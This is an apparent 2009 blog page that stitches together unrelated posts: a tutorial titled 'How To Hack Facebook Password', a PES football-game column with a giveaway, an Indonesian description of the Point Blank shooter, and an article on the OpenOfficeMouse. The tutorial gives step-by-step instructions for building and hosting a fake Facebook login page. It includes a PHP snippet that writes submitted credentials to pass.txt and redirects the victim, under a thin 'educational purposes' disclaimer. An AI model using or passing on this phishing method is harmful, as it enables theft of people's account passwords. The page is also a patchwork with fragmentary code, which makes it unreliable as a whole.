Minggu, 15 November 2009

How To Hack Facebook Password? (Copy)

Learn to hack facebook passwords

Are you curious to "hack facebook password" well then this post is just for you,Most people ask me to tell us the easiest way to hack facebook password,so here are some ways to hack facebook password:

1.Fake login page
3.Facebook new features

Update:Due to recent complains i have elobrated the post and change the login script please check it out

Today we will focus on the easiest way i.e Fake login page
A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

First of all download facebook fake login page:


1.once you have downloded facebook fake loginpage now extract contents in a folder
2.In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com , because i know about that site quite well.

6.Then upload the contents into a directory

7.For that,after creating an id you should go to file manager and upload all these files.

8.Then just got to Facebook.htm and try out whether its working .
After you type the file , a password file named pass.txt will be created in the same directory .
Then you can see what username and password you have entered.

Update:I have found another working php script you can also try this

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

In this way you can Hack a facebook password

Warning : This tutorial "How to hack facebook password " is for educational purposes

PES Matters

Just when I thought I would change the day I post my articles to space them out a bit more from Dan’s IWP articles, I clash with his article earlier today again! I think i will change to either Fridays or Saturdays to give IWP more prime space before I kick in.

At the moment I am still going crazy on the Master League and with essentially players with poor skills relatively, so the game is very challenging and not as rewarding as it will be when I sign better players and train up talented youngsters. Once I get to a stage where I am playing with decent players, I will take time out to spend some time playing the latest FIFA game to once again devote some time to comparing these two giants of footballing games.

I know I courted controversy the last time I compared PES and FIFA, and it is a difficult and emotional subject to broach, but I intend to try to be as tactful as well as honest as I can. I am aware of the fact that this is a PES site, and my allegiances truly do lie with PES, but I believe that in my capacity on this site, I should be challenging Konami to produce bigger and better. Anyway, the actual comparison won’t be for at least another six to eight weeks, since it’s only fair to play FIFA for a fair while to be able to guage it’s good and bad points, as I am currently doing so with PES.

In the meantime, I am pleased to announce that we have been given three copies of PES2010 on the PS2 by Konami, which I will be giving away in a competition. I was thinking about running another “Beat the Blogger” type competition, but have decided to run this one a little differently.

If you fancy a copy of it on the PS2, all you have to do is to tell me in no more than 200 words why PES is the game for you.

It’s that simple. The best three entries will bag a copy of the PS2 game. Email me at my usual address below. The competition end date is the 14th of December 2009. The sooner I get three winners the sooner the games go out, so get sending your entries.

This talk of competitions leads me nicely to my next topic of regular online competitions. We are going to be teaming up with www.pesrankings.com with lots of exciting prizes. We are looking to establish a permanent presence on pesrankings.com, so this should be an exciting time for everyone involved with our site. We will be looking to create a trial competition on the PS3 very soon to see how we fair. Hopefully we can get pretty efficient with running them, and have regular competitions for everyone to join in on.

That’s all I have for you guys this week, so I look forward to getting some entries in soon for the PS2 copies we have available.

Thanks for reading.

Point Blank - Game Online FPS

Point Blank adalah game online yang mengusung genre FPS (First Person Shooter). Anda dapat berperang dengan seluruh orang di Indonesia, mengumpulkan experience dan naik level. Mode game yang variatif dan unik
Mode permainan Point Blank udah ngelotok banget di otak Anda, ada Bomb Mission, Death Match, Eliminate. Peta destruktif, manfaatkan demi keuntungan perang. Efek fisik untuk beberapa objek pun bisa dimanfaatkan sebagai keuntungan perang seperti kaca pecah, damage akibat ledakan dan lain sebagainya. Sistem tunggu room di PB unik, Anda tidak perlu menunggu sampe semua slot terisi, asalkan lawan READY, maka permainan bisa berjalan. User lain yang mo gabung bisa langsung join kapan saja.

Belum cukup “pede” buat tanding sama teman? Tenang, kami sediakan akses latihan melawan AI. Tingkat kesulitan di mode ini akan beradaptasi dengan kemampuan pemainnya. Semua senjata yang Anda pake nanti akan selalu unik, karena senjata akan tersedia versi extended-nya. Jadi senjata bisa sama, tapi "taste"-nya beda. Demi menunjang realitas perang, fungsi Helm memengaruhi keamanan. Ditentukan probabilitas, ada satu kondisi di mana Anda tidak langsung mati karena "Head Shot," karena dilindungi Helm.
Ketika join ke klan, darimana Anda mengukur kemampuan? Di sini, system pemeringkatan bisa diketahui. Nama Anda akan tersimpan di database, sehingga siapa pun yang berhadapan dengan Anda, bisa "jiper" duluan. PB mengenal misi yang "diselipkan" di setiap ronde permainan. System ini akan memberi keuntungan pribadi untuk Anda.

OpenOffice Perkenalkan Mouse Joystick Analog

OpenOffice telah memperkenalkan perangkat penunjuk multi-button alternatif. OpenOfficeMouse seharga 75 USD (750 ribu rupiah) tersebut dilengkapi fitur 18 tombol, sebuah analog joystick dan dukungan hingga 52 perintah tombol.

“Anda dapat melakukan jauh lebih banyak dengan ini [perangkat] dibanding kebanyakan orang yang cenderung untuk menyadari pada awalnya”, jelas perancang mouse Theodore Beale. “Anda dapat menjalankan aplikasi dari desktop dan pada browser Anda, Anda dapat menjalankan sebuah situs internet tertentu dengan satu tombol, kemudian menutupnya dengan klik ganda pada tombol yang sama.”

Menurut Beale, OpenOfficeMouse menyederhanakan pelaksanaan perintah di kedua aplikasi dan game.

“Di Writer dan Calc, Anda dapat memiliki kemampuan yang lebih dan macro yang rumit pada satu baris dari tombol dan fungsi sederhana seperti bold, undo dan format sel yang lain”, kata Beale. “Di permainan seperti World of Warcraft - bahkan tanpa memperhitungkan joystick - Anda punya 16 perintah dalam satu kali klik, 40 dalam waktu dua dan semua 72 ikon pada halaman enam aksi dalam waktu hanya dua klik ganda atau kurang.”

Berikut spesifikasi OpenOfficeMouse yang meliputi:

  • 18 tombol mouse yang diprogram dengan fungsi klik ganda.
  • Tiga tombol yang berbeda mode: Key, Keypress, and Macro.
  • Josystick bergaya Xbox 360 Analog dengan opsi modus perintah 4, 8, dan 16 tombol.
  • scroll wheel yang bisa diklik.
  • 512k flash memory.
  • profil aplikasi 63 on-mouse dengan perangkat keras, perangkat lunak dan kemampuan autoswitching.
  • dukungan makro 1024-karakter.
  • Dukungan perangkat lunak open source untuk membuat, mengelola dan profil aplikasi kustomisasi.
  • Impor dan ekspor profil kustom dalam format XML.
  • notifikasi Audio opsional profil switching dengan file wave yang bisa dikustomisasi.
  • PDF ekspor tombol profil tugas.
  • Adjustable resolusi dari 400 sampai 1,600 CPI.
  • 20 default profil untuk permainan dan aplikasi populer, termasuk Adobe Photoshop, GIMP, WoW dan COD.
  • dukungan Cross-platform untuk Windows, Linux dan OS X.